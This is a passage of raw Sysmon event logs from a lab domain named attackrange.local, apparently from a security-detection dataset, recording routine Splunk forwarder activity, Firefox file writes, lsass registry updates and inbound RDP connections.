Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.319{466BC892-F3E5-60EB-127D-00000000CF01}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001047639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.691{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-39588-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001047638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.670{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50976-false10.0.1.12-8000- 23542300x80000000000000001047637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.554{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ECA3360DDFE0444331B2B252F852BA4,SHA256=F7D06A31EFCC885507DD2EE6DFEC3B555374D40E287441B6FB75C678EA8193C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:54.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FB43AA85163BB36C187583DF35C45E3,SHA256=86287320798AEB78AD0ED2195488E189D9BE43C7E7C23115236AF9D0C23FEAA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E6-60EB-137D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:54.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:54.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3E6-60EB-137D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E6-60EB-137D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.013{466BC892-F3E6-60EB-137D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001047653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:47.386{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-49417-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001047652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=58DE94B69948D998DC79B8D7621A69CA,SHA256=679951D43ACE098577BFC5D61A381A9BCEED9F3007B655C69F03236DA79FFF35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=82B8FFBB0FED0185E58465CCC1646C57,SHA256=D0FF8D05D5E196F3703FDA78DF5842C3D59C970FE9B66DA024384B4D9F9D0C7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3E567EB64C5D803A95CDA5693B13FF0A,SHA256=F46C5CDC00D2B197CA4C4E6FF726AA75579CE91DA7A3089482CB333290E0B703,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6555AEBABFB541221F8FA2F0F78EA93B,SHA256=A85F6B6419C5D58AEDFDDF6663B075D4B0003A59EC32C38B85A58167090D35EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=961B093941269A41F1D1D5F6137468C7,SHA256=DE38CFDDC678CCA1F379B4A779FDFEF88A7A6352BE7BFFE0EE49845B7DD3856A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=14E5088BB640FA8EA3C1ED313CE526FD,SHA256=139FDD0B6C56C8A3127E6ABCA7AC0D666121D969C99AB4A1DDAA490381278523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=31EC7F97E15CE98B3710937E1D43DFF4,SHA256=DD655C9E899C04E0417FF8713C51FE5800FA4D570CA220EC9C21382C382F4CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=98AAAA1F822F649AFFA47B9BFA2223DB,SHA256=CDF95185817F307C0F4BA91A90F543EDC8284B576472E89E327DB409ECAFC0C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DD9C7EE2557C4365F12D9B9D384A6589,SHA256=633AE17EE1F01217378C66148114DEE00FD66C8D09F1C08E102187D389E572BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=205B7C820413DBB0194B41EB63ECAB1C,SHA256=79E66B871490AE05C0FC32D33BC97A3940F6532DBD361FC1F36930CA4A816D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D1E79EBE5F248C041C2A6AF28C00279D,SHA256=407A50F15604FE3BE5031FD8A73F6A1C20773CC7E72EA474D75764AFAAA2F694,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.569{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78168E5F93942C0469CABB8B944EF9D9,SHA256=25A254D8E3F886EABEC8520084EF90BC161C6FC9D39314F2B945979DCC487D98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:55.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5228718D47203D548DB9629BC8CEBEDD,SHA256=74459FEC6EECF50610CBFD0CF38C9A4AE3459B36F2A6F6A0B6B90FA3FF2E0622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.069{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=087864088BAAC4C140C0E82992275324,SHA256=B374A8D681AF6EEC5EA9F8ADAA903F4FDBE6EC5400E5115CA803DEBCE64CCDAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:56.868{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:56.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EFF91E2D040257339C21DAFDDF05EBC,SHA256=51D6C3A71D0DAA9651FB8CEEDC4E278B86DAE2CA020F5FECA5589A29B5FABEA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:56.282{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B398680975E719EFFA76C3CDC087C35,SHA256=339F08135587A8418A8E1668FD27C2BF11C2C9D135144BF8560A7FC3B52F9A0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:57.618{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B915A420F849C1344D7100B5430CFC87,SHA256=A175161F097026F336BBCF2C8788CC104726E8BB1129ED35F41B769D9EBD37DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:57.360{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43B959DE59D0580C356CF7359508F405,SHA256=DA2FF5EE3A12BE57B9B9FA8D17130CA80E6BF53152BB1B0100EC5146D6A4A669,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:57.227{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57221-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:58.391{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1592DB1F34AE369552088296E4B0EF,SHA256=EE0851A0228297B0C5F7B4D5F52504901B5910FC00ECB76EEA6DBC4A39AF4526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:58.635{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0784EF7150DB64FE9DF971DFA105D9,SHA256=19609CF3F0BDA82EB75A870CA76D4305643C913E2FDCA9FCE88E55AF81481B08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:58.098{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf66480f.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:59.650{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B8C50E283B0FB853B158CA2E23A33CF,SHA256=667A0079E5B24F8F947238C594D6590CAB40C62F1160FBA54A10A4545568AA77,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:59.422{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAC67D0CA211A6FBA1578D285BB94CBB,SHA256=D08CB436F71D9A19A08ADE3EBCBD1BA6BE0DA0903F35A4DCD54D44C3121C78CB,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001047669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001047668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f664dfb) 13241300x80000000000000001047667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0xfdc3c6fc) 13241300x80000000000000001047666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f2-0x5f882efc) 13241300x80000000000000001047665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0xc14c96fc) 13241300x80000000000000001047664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001047663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f664dfb) 13241300x80000000000000001047662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0xfdc3c6fc) 13241300x80000000000000001047661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD 